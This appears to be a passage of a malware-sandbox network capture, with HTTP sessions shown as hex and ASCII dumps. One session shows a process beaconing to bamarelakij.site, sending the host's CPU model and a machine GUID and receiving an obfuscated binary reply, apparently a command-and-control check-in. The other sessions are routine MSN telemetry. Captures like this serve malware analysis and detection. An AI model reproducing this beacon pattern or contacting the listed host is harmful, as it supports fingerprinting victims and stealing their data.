                                                                                                                                                                ETag: "dda11c98eb61db1:0"
                                                                                                                                                                Server: Microsoft-IIS/10.0
                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
                                                                                                                                                                Set-Cookie: SM=C; domain=c.msn.com; path=/; SameSite=None; Secure;
                                                                                                                                                                Set-Cookie: MUID=0E823CD872A76198161729B773BE609A; domain=.msn.com; expires=Tue, 03-Feb-2026 13:42:39 GMT; path=/; SameSite=None; Secure; Priority=High;
                                                                                                                                                                Set-Cookie: SRM_M=0E823CD872A76198161729B773BE609A; domain=c.msn.com; expires=Tue, 03-Feb-2026 13:42:39 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                Set-Cookie: MR=0; domain=c.msn.com; expires=Thu, 16-Jan-2025 13:42:39 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                Set-Cookie: ANONCHK=0; domain=c.msn.com; expires=Thu, 09-Jan-2025 13:52:39 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                Date: Thu, 09 Jan 2025 13:42:39 GMT
                                                                                                                                                                Connection: close
                                                                                                                                                                Content-Length: 42
                                                                                                                                                                2025-01-09 13:42:40 UTC42INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 01 4c 00 3b
                                                                                                                                                                Data Ascii: GIF89a!,L;


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                11192.168.2.750061104.21.80.524437832C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2025-01-09 13:42:40 UTC354OUTPOST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Accept: */*
                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
                                                                                                                                                                Content-Length: 147
                                                                                                                                                                Host: bamarelakij.site
                                                                                                                                                                2025-01-09 13:42:40 UTC147OUTData Raw: 00 00 00 00 03 00 00 00 fd ff ff ff 00 00 00 00 92 00 00 00 00 00 00 60 00 00 00 fe ff ff ff 00 00 00 00 97 00 a0 d9 26 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a a0 ce 64 4e 2d f0 cf 01 d9 f5 d7 9d 1e 13 ec d9 24 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                Data Ascii: `&Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzdN-$9e146be9-c76a-4720-bcdb-53011b87bd06
                                                                                                                                                                2025-01-09 13:42:40 UTC827INHTTP/1.1 200 OK
                                                                                                                                                                Date: Thu, 09 Jan 2025 13:42:40 GMT
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                pid: 1V/P0mPQQSCTS08rUK676SzNB/ZpQ2o6hGfMU4k1Y8Y86gb2rF0ak7cf4BYAW0D4A9tKmQjRguuH
                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0oUTdkQl6UL2K3LhYFGQRVWEXKJoqw%2FczLILXcTySfw1c9q2e5KPB9R1d81fTP4rJ8GJiaXbB55N41TGiRF%2FZMGS7fgXo1p18LpixmnKBHxGwmGD4JjHAsYwLivhuJD5RI7t"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8ff4da173f085e7f-EWR
                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1607&min_rtt=1607&rtt_var=604&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1137&delivery_rate=1810291&cwnd=228&unsent_bytes=0&cid=2e5e57db2071638f&ts=277&x=0"
                                                                                                                                                                2025-01-09 13:42:40 UTC1369INData Raw: 33 32 66 32 0d 0a 00 00 00 00 1c 8a 00 00 f5 54 29 07 00 00 00 00 56 03 d4 02 15 00 08 00 08 1f 0f 17 15 04 dd 6c 08 dd 4c d4 02 4e d4 89 08 0a 5c fb d8 5a 90 45 5b 4e d7 d0 6c 1d 03 f5 0b 15 00 08 00 08 1f 0f 17 15 04 d9 6c 08 d9 b8 f5 0b 57 06 36 49 41 a7 98 95 e0 e4 de cc d2 d8 ca e6 0d 03 09 0d 15 00 08 00 08 1f 0f 17 15 04 dd 6c 08 dd f9 09 0d fd 57 7f 48 6c 7c b9 b1 17 ec 4c e4 d7 08 6d fa 67 0c 3b 02 15 00 0f 00 08 1f 0f 17 15 04 d9 6c 08 d9 b8 3b 02 57 06 36 49 41 a7 98 95 9c ca e8 ee de e4 d6 b8 86 de de d6 d2 ca e6 fb 06 90 02 11 00 04 00 08 1f 0f 17 15 04 c9 6c 04 c9 31 90 02 48 34 d6 d3 2a f9 e3 d9 a7 07 a0 09 11 00 04 00 08 1f 0f 17 15 04 c9 6c 04 c9 12 a0 09 ea 76 df 2c 89 bf ea 26 01 0b a2 0a 15 00 08 00 08 1f 0f 17 15 04 dd 6c 08 dd f9 a2
                                                                                                                                                                Data Ascii: 32f2T)VlLN\ZE[NllW6IAlWHl|Lmg;l;W6IAl1H4*lv,&l
                                                                                                                                                                2025-01-09 13:42:40 UTC1369INData Raw: 17 15 04 d9 6c 08 d9 10 c8 0a 57 06 36 49 41 a7 98 95 e6 ca c6 da de c8 5c c8 c4 11 0b 98 06 11 00 04 00 08 1f 0f 17 15 04 c9 6c 04 c9 12 98 06 fa 9a f0 97 98 b2 30 98 cc 02 02 0e 11 00 04 00 08 1f 0f 17 15 04 c9 6c 04 c9 12 02 0e da 30 e2 10 b8 f9 d7 1a 35 08 34 0a 15 00 1d 00 08 1f 0f 17 15 04 d9 6c 08 d9 b1 34 0a 57 06 36 49 41 a7 98 95 c8 d2 e6 c6 de e4 c8 b8 98 de c6 c2 d8 40 a6 e8 de e4 c2 ce ca b8 d8 ca ec ca d8 c8 c4 06 08 5b 00 15 00 01 00 08 1f 0f 17 15 04 d9 6c 08 d9 12 5b 00 57 06 36 49 41 a7 98 95 54 56 05 3b 0a 15 00 01 00 08 1f 0f 17 15 04 d9 6c 08 d9 0b 3b 0a 57 06 36 49 41 a7 98 95 00 50 02 23 08 15 00 11 00 08 1f 0f 17 15 04 d9 6c 08 d9 d8 23 08 57 06 36 49 41 a7 98 95 9a d2 c6 e4 de e6 de cc e8 b8 9e ea e8 d8 de de d6 20 00 a8 08 15 00
                                                                                                                                                                Data Ascii: lW6IA\l0l054l4W6IA@[l[W6IATV;l;W6IAP#l#W6IA
                                                                                                                                                                2025-01-09 13:42:40 UTC1369INData Raw: a6 9e 8c a8 ae 82 a4 8a b8 9e e0 ca dc ac a0 9c b6 0a b8 04 15 00 1c 00 08 1f 0f 17 15 04 d9 6c 08 d9 12 b8 04 57 06 36 49 41 a7 98 95 c2 e8 de da d2 c6 b8 98 de c6 c2 d8 40 a6 e8 de e4 c2 ce ca b8 d8 ca ec ca d8 c8 c4 bd 0c d2 0a 15 00 11 00 08 1f 0f 17 15 04 d9 6c 08 d9 4c d2 0a 57 06 36 49 41 a7 98 95 44 ca dc c6 e4 f2 e0 e8 ca c8 be d6 ca f2 44 74 44 58 0e e4 08 11 00 04 00 08 1f 0f 17 15 04 c9 6c 04 c9 d8 e4 08 74 a8 ff 53 24 61 ca 59 9f 07 a9 0d 11 00 04 00 08 1f 0f 17 15 04 c9 6c 04 c9 d8 a9 0d f3 13 76 8f 90 da 43 85 46 0b 90 0a 15 00 08 00 08 1f 0f 17 15 04 dd 6c 08 dd 12 90 0a 55 e6 71 be ae 93 9a 88 be 5d 42 12 15 e7 4e c3 b8 06 ac 0b 15 00 07 00 08 1f 0f 17 15 04 d9 6c 08 d9 d8 ac 0b 57 06 36 49 41 a7 98 95 9e ea e8 d8 de de d6 8d 00 3a 0b 11
                                                                                                                                                                Data Ascii: lW6IA@lLW6IADDtDXltS$aYlvCFlUq]BNlW6IA:
                                                                                                                                                                2025-01-09 13:42:40 UTC1369INData Raw: 92 03 0a 48 0b 11 00 04 00 08 1f 0f 17 15 04 c9 6c 04 c9 b8 48 0b 47 71 56 f0 25 59 96 ff 53 00 c5 01 15 00 11 00 08 1f 0f 17 15 04 d9 6c 08 d9 f9 c5 01 57 06 36 49 41 a7 98 95 a6 9e 8c a8 ae 82 a4 8a b8 a8 d2 ce ca e4 ac 9c 86 01 00 2c 00 15 00 07 00 08 1f 0f 17 15 04 d9 6c 08 d9 b8 2c 00 57 06 36 49 41 a7 98 95 86 aa a4 a4 8a 9c a8 d1 08 e9 04 11 00 04 00 08 1f 0f 17 15 04 c9 6c 04 c9 d8 e9 04 82 87 32 05 e1 4e 07 0f 2c 0e 12 0f 11 00 04 00 08 1f 0f 17 15 04 c9 6c 04 c9 12 12 0f 39 2a b2 22 5b e3 87 28 d3 0b a2 0e 15 00 07 00 08 1f 0f 17 15 04 d9 6c 08 d9 d8 a2 0e 57 06 36 49 41 a7 98 95 86 de de d6 d2 ca e6 af 03 e9 0e 15 00 12 00 08 1f 0f 17 15 04 d9 6c 08 d9 10 e9 0e 57 06 36 49 41 a7 98 95 cc de e4 da d0 d2 e6 e8 de e4 f2 5c e6 e2 d8 d2 e8 ca ed 08
                                                                                                                                                                Data Ascii: HlHGqV%YSlW6IA,l,W6IAl2N,l9*"[(lW6IAlW6IA\
                                                                                                                                                                2025-01-09 13:42:40 UTC1369INData Raw: d8 d2 c6 c2 e8 d2 de dc b8 da e6 ca c8 ce ca 5c ca f0 ca 28 03 13 09 15 00 08 00 08 1f 0f 17 15 04 dd 6c 08 dd 0b 13 09 90 1a 8e 10 93 a1 e9 4e 7a a1 bd bc 28 d5 3d 05 9d 01 2b 05 11 00 04 00 08 1f 0f 17 15 04 c9 6c 04 c9 b1 2b 05 c1 d2 5d 0e a3 1b 68 04 55 08 0d 0f 11 00 04 00 08 1f 0f 17 15 04 c9 6c 04 c9 b8 0d 0f de b4 9a 63 b8 7d af 69 4f 0b 51 0f 15 00 08 00 08 1f 0f 17 15 04 dd 6c 08 dd b8 51 0f 8e 2c b9 76 bf 66 da b8 01 97 8a da 04 12 0e f3 1b 0f 3f 04 15 00 15 00 08 1f 0f 17 15 04 d9 6c 08 d9 f9 3f 04 57 06 36 49 41 a7 98 95 aa d8 e8 e4 c2 ac 9c 86 b8 ea d8 e8 e4 c2 ec dc c6 5c d2 dc d2 1b 07 22 00 11 00 04 00 08 1f 0f 17 15 04 c9 6c 04 c9 4c 22 00 88 8c 51 20 82 b3 ae 26 58 02 dd 09 15 00 25 00 08 1f 0f 17 15 04 d9 6c 08 d9 48 dd 09 57 06 36 49
                                                                                                                                                                Data Ascii: \(lNz(=+l+]hUlc}iOQlQ,vf?l?W6IA\"lL"Q &X%lHW6I
                                                                                                                                                                2025-01-09 13:42:40 UTC1369INData Raw: 00 04 00 08 1f 0f 17 15 04 c9 6c 04 c9 12 fd 01 ed dd 14 dd 8f f5 d4 d2 bb 03 d3 04 11 00 04 00 08 1f 0f 17 15 04 c9 6c 04 c9 d8 d3 04 66 c3 c8 8d 05 0a fd 87 91 08 e0 03 11 00 04 00 08 1f 0f 17 15 04 c9 6c 04 c9 f9 e0 03 8b 9b 77 43 e8 52 42 49 ce 0a 41 04 15 00 08 00 08 1f 0f 17 15 04 dd 6c 08 dd d8 41 04 ab 3b 9f 71 44 8a ad 27 24 80 ac dd ff fe 79 6c 84 05 73 06 11 00 04 00 08 1f 0f 17 15 04 c9 6c 04 c9 d8 73 06 6e 68 98 7e 0d a1 ad 74 2f 06 6d 03 15 00 08 00 08 1f 0f 17 15 04 dd 6c 08 dd b8 6d 03 a3 25 be e4 09 f7 b9 f4 48 9e 8d 48 b2 83 6d bf 6c 05 8c 03 15 00 04 00 08 1f 0f 17 15 04 d9 6c 08 d9 b8 8c 03 57 06 36 49 41 a7 98 95 98 9e 86 96 b6 07 2f 09 15 00 08 00 08 1f 0f 17 15 04 dd 6c 08 dd f9 2f 09 93 2e 93 85 52 c9 02 e0 79 95 a0 29 e9 bd d6 ab
                                                                                                                                                                Data Ascii: llflwCRBIAlA;qD'$ylslsnh~t/mlm%HHmllW6IA/l/.Ry)
                                                                                                                                                                2025-01-09 13:42:40 UTC1369INData Raw: 1f 0f 17 15 04 c9 6c 04 c9 12 c7 03 2e c2 65 cb 4d 0b 50 c1 af 0a 87 0e 15 00 01 00 08 1f 0f 17 15 04 d9 6c 08 d9 12 87 0e 57 06 36 49 41 a7 98 95 54 eb 0b ff 01 15 00 2d 00 08 1f 0f 17 15 04 d9 6c 08 d9 48 ff 01 57 06 36 49 41 a7 98 95 cc e8 e0 b8 ae d2 dc a6 86 a0 b8 92 dc d2 be 8c d2 d8 ca e6 b8 d8 de c6 c2 d8 82 e0 e0 88 c2 e8 c2 a0 e4 de ce e4 c2 da e6 5c d2 dc d2 68 06 8d 09 11 00 04 00 08 1f 0f 17 15 04 c9 6c 04 c9 12 8d 09 93 20 7d 30 f1 08 bd 3f 4c 03 b6 0b 11 00 04 00 08 1f 0f 17 15 04 c9 6c 04 c9 4c b6 0b 5c 2d 31 21 fe ac 26 0e 79 02 c4 00 15 00 1b 00 08 1f 0f 17 15 04 d9 6c 08 d9 12 c4 00 57 06 36 49 41 a7 98 95 ee c2 d8 d8 ca e8 e6 b8 84 d2 e8 c6 de d2 dc 86 de e4 ca b8 ee c2 d8 d8 ca e8 e6 3a 08 ee 08 15 00 08 00 08 1f 0f 17 15 04 d9 6c 08
                                                                                                                                                                Data Ascii: l.eMPlW6IAT-lHW6IA\hl }0?LlL\-1!&ylW6IA:l
                                                                                                                                                                2025-01-09 13:42:40 UTC1369INData Raw: 0e 6c 0f 11 00 04 00 08 1f 0f 17 15 04 c9 6c 04 c9 d8 6c 0f 42 9b ba 7b 25 52 8f 71 0f 04 2d 06 15 00 17 00 08 1f 0f 17 15 04 d9 6c 08 d9 12 2d 06 57 06 36 49 41 a7 98 95 ee c2 d8 d8 ca e8 e6 b8 86 de d2 dc de da d2 b8 ee c2 d8 d8 ca e8 e6 6f 0e 8d 02 15 00 07 00 08 1f 0f 17 15 04 d9 6c 08 d9 b8 8d 02 57 06 36 49 41 a7 98 95 86 de de d6 d2 ca e6 e3 04 82 05 11 00 04 00 08 1f 0f 17 15 04 c9 6c 04 c9 12 82 05 cc 3f a5 88 ae f6 90 82 36 0a 48 0a 15 00 1d 00 08 1f 0f 17 15 04 d9 6c 08 d9 b1 48 0a 57 06 36 49 41 a7 98 95 da ca e6 e6 ca dc ce ca e4 e6 b8 88 d2 e6 c6 de e4 c8 b8 a6 e8 c2 c4 d8 ca b8 d6 ca f2 b5 09 3a 00 15 00 05 00 08 1f 0f 17 15 04 d9 6c 08 d9 d8 3a 00 57 06 36 49 41 a7 98 95 54 5c d2 dc d2 58 01 07 0c 15 00 58 00 08 1f 0f 17 15 04 d9 6c 08 d9
                                                                                                                                                                Data Ascii: lllB{%Rq-l-W6IAolW6IAl?6HlHW6IA:l:W6IAT\XXl
                                                                                                                                                                2025-01-09 13:42:40 UTC1369INData Raw: 04 c9 b8 e5 0e 88 6e 1b 6b e8 a7 2e 61 7a 0b 84 0c 11 00 04 00 08 1f 0f 17 15 04 c9 6c 04 c9 b8 84 0c 97 59 65 a7 1d 93 50 ad d0 01 7d 02 15 00 07 00 08 1f 0f 17 15 04 d9 6c 08 d9 0b 7d 02 57 06 36 49 41 a7 98 95 82 dc f2 88 ca e6 d6 03 09 9a 08 15 00 05 00 08 1f 0f 17 15 04 d9 6c 08 d9 d8 9a 08 57 06 36 49 41 a7 98 95 a8 e4 c2 e6 d0 ff 05 a1 0b 15 00 07 00 08 1f 0f 17 15 04 d9 6c 08 d9 b8 a1 0b 57 06 36 49 41 a7 98 95 90 d2 e6 e8 de e4 f2 7b 03 d3 02 15 00 15 00 08 1f 0f 17 15 04 d9 6c 08 d9 d8 d3 02 57 06 36 49 41 a7 98 95 9e ea e8 d8 de de d6 64 60 62 6c b8 c8 c2 e8 c2 5c d4 e6 de dc ae 0d f0 0a 15 00 08 00 08 1f 0f 17 15 04 dd 6c 08 dd 31 f0 0a 88 fb 77 36 9a e2 37 4f 62 40 44 9a 21 96 e3 04 e7 0c 79 01 15 00 0c 00 08 1f 0f 17 15 04 d9 6c 08 d9 0b 79
                                                                                                                                                                Data Ascii: nk.azlYeP}l}W6IAlW6IAlW6IA{lW6IAd`bl\l1w67Ob@D!yly


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                12192.168.2.75006040.79.167.84437832C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2025-01-09 13:42:40 UTC1034OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736430158575&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                Host: browser.events.data.msn.com
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Content-Length: 11483
                                                                                                                                                                sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                Accept: */*
                                                                                                                                                                Origin: https://ntp.msn.com
                                                                                                                                                                Sec-Fetch-Site: same-site
                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                Referer: https://ntp.msn.com/
                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                Cookie: USRLOC=; MUID=0E823CD872A76198161729B773BE609A; _EDGE_S=F=1&SID=0C1F4AD11C6365C209785FBE1D6C642F; _EDGE_V=1; msnup=
                                                                                                                                                                2025-01-09 13:42:40 UTC11483OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 35 2d 30 31 2d 30 39 54 31 33 3a 34 32 3a 33 38 2e 35 37 33 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 32 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 62 38 36 38 34 39 38 34 2d 37 64 32 34 2d 34 65 38 34 2d 62 61 66 61 2d 62 31 39 30 39 63 61 65 66 31 66 32 22 2c 22 65 70 6f 63 68 22 3a 22 32 34 30 33 31 39 35 39 31 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 22
                                                                                                                                                                Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2025-01-09T13:42:38.573Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":2,"installId":"b8684984-7d24-4e84-bafa-b1909caef1f2","epoch":"240319591"},"app":{"locale"
                                                                                                                                                                2025-01-09 13:42:40 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                Set-Cookie: MC1=GUID=0d363b20fef248d29d7c0a327fffe90e&HASH=0d36&LV=202501&V=4&LU=1736430160760; Domain=.microsoft.com; Expires=Fri, 09 Jan 2026 13:42:40 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                Set-Cookie: MS0=8faff2a857dd436fa369e76196994cb8; Domain=.microsoft.com; Expires=Thu, 09 Jan 2025 14:12:40 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                time-delta-millis: 2185
                                                                                                                                                                Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                Access-Control-Allow-Methods: POST
                                                                                                                                                                Access-Control-Allow-Credentials: true
                                                                                                                                                                Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                Date: Thu, 09 Jan 2025 13:42:40 GMT
                                                                                                                                                                Connection: close


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                13192.168.2.75005940.79.167.84437832C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2025-01-09 13:42:40 UTC1034OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736430158586&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                Host: browser.events.data.msn.com
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Content-Length: 33238
                                                                                                                                                                sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                Accept: */*
                                                                                                                                                                Origin: https://ntp.msn.com
                                                                                                                                                                Sec-Fetch-Site: same-site
                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                Referer: https://ntp.msn.com/
                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                Cookie: USRLOC=; MUID=0E823CD872A76198161729B773BE609A; _EDGE_S=F=1&SID=0C1F4AD11C6365C209785FBE1D6C642F; _EDGE_V=1; msnup=
                                                                                                                                                                2025-01-09 13:42:40 UTC16384OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 35 2d 30 31 2d 30 39 54 31 33 3a 34 32 3a 33 38 2e 35 38 33 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 33 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 62 38 36 38 34 39 38 34 2d 37 64 32 34 2d 34 65 38 34 2d 62 61 66 61 2d 62 31 39 30 39 63 61 65 66 31 66 32 22 2c 22 65 70 6f 63 68 22 3a 22 32 34 30 33 31 39 35 39 31 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 22
                                                                                                                                                                Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2025-01-09T13:42:38.583Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":3,"installId":"b8684984-7d24-4e84-bafa-b1909caef1f2","epoch":"240319591"},"app":{"locale"
                                                                                                                                                                2025-01-09 13:42:40 UTC16384OUTData Raw: 65 67 6f 72 79 22 3a 22 61 6e 74 70 22 2c 22 64 6f 6d 61 69 6e 49 64 22 3a 22 33 34 30 22 2c 22 76 65 72 74 69 63 61 6c 22 3a 22 68 6f 6d 65 70 61 67 65 22 2c 22 74 6f 70 69 63 22 3a 22 44 69 73 63 6f 76 65 72 22 7d 2c 22 69 73 41 64 45 6e 61 62 6c 65 64 22 3a 66 61 6c 73 65 2c 22 69 73 41 75 74 6f 52 65 66 72 65 73 68 22 3a 66 61 6c 73 65 2c 22 69 73 4a 53 45 6e 61 62 6c 65 64 22 3a 74 72 75 65 2c 22 69 73 53 74 61 74 69 63 22 3a 66 61 6c 73 65 2c 22 6e 61 6d 65 22 3a 22 64 65 66 61 75 6c 74 22 2c 22 6f 63 69 64 22 3a 22 6d 73 65 64 67 64 68 70 22 2c 22 70 72 6f 64 75 63 74 22 3a 22 61 6e 61 68 65 69 6d 22 2c 22 74 79 70 65 22 3a 22 64 68 70 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 6e 74 70 2e 6d 73 6e 2e 63 6f 6d 2f 65 64 67 65 2f 6e 74 70 3f
                                                                                                                                                                Data Ascii: egory":"antp","domainId":"340","vertical":"homepage","topic":"Discover"},"isAdEnabled":false,"isAutoRefresh":false,"isJSEnabled":true,"isStatic":false,"name":"default","ocid":"msedgdhp","product":"anaheim","type":"dhp","url":"https://ntp.msn.com/edge/ntp?
                                                                                                                                                                2025-01-09 13:42:40 UTC470OUTData Raw: 6f 67 6f 2d 63 6f 6c 6f 72 2d 62 6c 61 63 6b 2e 73 76 67 22 3a 7b 22 74 79 70 65 22 3a 22 6f 22 2c 22 73 70 61 6e 73 22 3a 7b 22 6e 65 74 77 6f 72 6b 22 3a 5b 38 38 38 37 2c 33 39 37 5d 7d 2c 22 64 75 72 61 74 69 6f 6e 73 22 3a 7b 22 63 6f 6e 6e 65 63 74 22 3a 32 30 33 2c 22 72 65 71 75 65 73 74 22 3a 31 39 34 2c 22 63 64 6e 54 43 50 22 3a 31 38 31 2c 22 63 64 6e 53 65 6c 66 22 3a 30 2c 22 63 64 6e 4f 72 69 67 69 6e 22 3a 30 7d 2c 22 73 63 61 6c 61 72 73 22 3a 7b 22 73 69 7a 65 22 3a 32 30 37 30 2c 22 63 61 63 68 65 22 3a 30 7d 7d 2c 22 5b 63 64 6e 5d 2f 73 74 61 74 69 63 73 62 2f 73 74 61 74 69 63 73 2f 6c 61 74 65 73 74 2f 69 63 6f 6e 73 2d 77 63 2f 69 63 6f 6e 73 2f 66 65 65 64 73 65 74 74 69 6e 67 73 2e 73 76 67 22 3a 7b 22 74 79 70 65 22 3a 22 6f 22
                                                                                                                                                                Data Ascii: ogo-color-black.svg":{"type":"o","spans":{"network":[8887,397]},"durations":{"connect":203,"request":194,"cdnTCP":181,"cdnSelf":0,"cdnOrigin":0},"scalars":{"size":2070,"cache":0}},"[cdn]/staticsb/statics/latest/icons-wc/icons/feedsettings.svg":{"type":"o"
                                                                                                                                                                2025-01-09 13:42:41 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                Set-Cookie: MC1=GUID=35ce28cd45c14bb798e7664a52db2860&HASH=35ce&LV=202501&V=4&LU=1736430160883; Domain=.microsoft.com; Expires=Fri, 09 Jan 2026 13:42:40 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                Set-Cookie: MS0=1ae3face5245438e873cc8dcefbd87fb; Domain=.microsoft.com; Expires=Thu, 09 Jan 2025 14:12:40 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                time-delta-millis: 2297
                                                                                                                                                                Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                Access-Control-Allow-Methods: POST
                                                                                                                                                                Access-Control-Allow-Credentials: true
